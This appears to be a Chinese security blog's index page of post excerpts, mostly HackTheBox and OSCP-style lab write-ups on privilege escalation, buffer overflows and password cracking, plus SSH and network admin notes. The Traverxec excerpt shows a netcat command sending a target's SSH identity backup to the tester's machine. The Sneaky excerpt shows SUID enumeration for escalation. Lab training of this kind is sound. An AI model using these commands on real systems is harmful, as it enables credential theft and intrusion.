Calamity(lxd之linux容器错误权限的提权) 上一篇:Calamity(web rce)上一篇:Calamity(web rce)categories: - training上一篇:Calamity(web rce) Calamity(lxd之linux容器错误权限的提权)参考资料: https://reboare.github.io/hackthebox/calamity.html https://www.youtube.com/wat 2020-01-09 运维 安全工具 渗透测试 容器安全
Sneaky(suid+缓冲区溢出提权) 上一篇:Sneaky(snmp默认口令泄露敏感信息) 参考资料: 缓冲区溢出案例(一) ippsec youtube video 名词解释函数返回地址:保存当前函数调用前的信息,一边函数返回时能够回复到函数被调用前的代码区中继续执行指令。EIP: 指令寄存器,指向下一条等待执行的指令地址。 找到suid权限的程序1find / -perm -4000 2>/dev/null > 2020-01-06 安全工具 渗透测试 免杀 缓冲区溢出
电脑有线宽带共享给手机无线上网 电脑有线宽带共享给手机无线上网,优点:只需要一台电脑,不需要买其他硬件。 开启wifi 确认电脑网卡支持承载网络netsh wlan show drivers 你的网卡必须支持承载网络,如果网卡不支持承载网络,就无法共享wifi给手机上网。 确认windows已经开启防火墙,否则wifi数据传输可能出错 cmd命令配置热点名称和密码1netsh wlan set hostednetwork mod 2020-01-02 网络设置 部署过程 过程记录 网络共享
Traverxec(ssh2john爆破id_rsa对应密码) 目标机器主动连接kali,成功kali: nc -lnvp 8888 > backup-ssh-identity-files.tgz目标机器:nc 10.10.14.8 8888 -w 10 < backup-ssh-identity-files.tgz 解压gunzip backup-ssh-identity-files.tgz解压后,发现/home/david 2020-01-01 部署过程 安全工具 渗透测试 密码破解
hashcat 参考资料: https://www.youtube.com/watch?v=EfqJCKWtGiU&feature=youtu.be https://hashcat.net/hashcat/ kali vmkali vm自带hashcat,但是该软件需要使用GPU,缺少一些驱动还是什么原因,无法直接使用。 查找了一些解决办法,在虚拟机下使用hashcat不是不可以,只是太繁琐了。于 2019-12-31 编程 安全工具 渗透测试 密码破解
ssh端口转发 参考资料: https://www.ssh.com/ssh/tunneling/example#remote-forwarding 修改VPS ssh配置vi /etc/ssh/sshd_config 与portForwarding相关的都改为yes. 本地端口转发LPF当本地不能直接连接外部服务的时候,使用LPF 案例一:两个机器12345678910-f 后台启用-g 启用网关功能-N 不 2019-12-25 运维 网络设置 部署过程 端口转发
ssh允许密码登陆 ubuntu因为安全机制,只允许密钥文件登入,现在修改为允许密码登入。 1,允许密码登入sudo vi /etc/ssh/sshd_config 找到passwordAuthentication项,修改成yes 2,允许root登入继续修改sshd_config文件 找到并用**#注释**掉这行:PermitRootLogin prohibit-password 新建 2019-12-24 运维 网络设置 安全工具 SSH配置
masscan扫描结束后不返回结果 https://github.com/robertdavidgraham/masscan/issues/144 12345678910masscan --versionMasscan version 1.0.5apt-get -y remove masscan$git clone https://github.com/robertdavidgraham/masscan$ cd masscan$ m 2019-12-21 运维 部署过程 安全工具 网络扫描
slmail&windows缓冲区溢出案例(一) 缓冲区溢出案例与exp开发流程 bug是怎么找到的? 你怎么知道x比特在y命令,可以使应用程序崩溃造成缓冲区溢出漏洞? 缓冲区溢出案例与exp开发流程 bug是怎么找到的? 你怎么知道x比特在y命令,可以使应用程序崩溃造成缓冲区溢出漏洞?categories: buffer overflow 缓冲区溢出案例与exp开发流程 bug是怎么找到的? 你怎么知道x比特在y命令,可以使应用程序 2019-12-13 部署过程 安全工具 渗透测试 安全开发 漏洞分析 缓冲区溢出
OSCP-like linux VMs 参考资料: https://github.com/ferreirasc/oscp Kioptrix: Level 1 (#1)writeup 渗透思路:samba版本漏洞,远程缓冲区溢出,使用msf to root Kioptrix: Level 1.1 (#2)writeup 上 writeup 下 渗透思路:linux + web 远程命令执行漏洞,获得shell。linux内核漏洞提权。 2019-12-12 oscp 参考资料: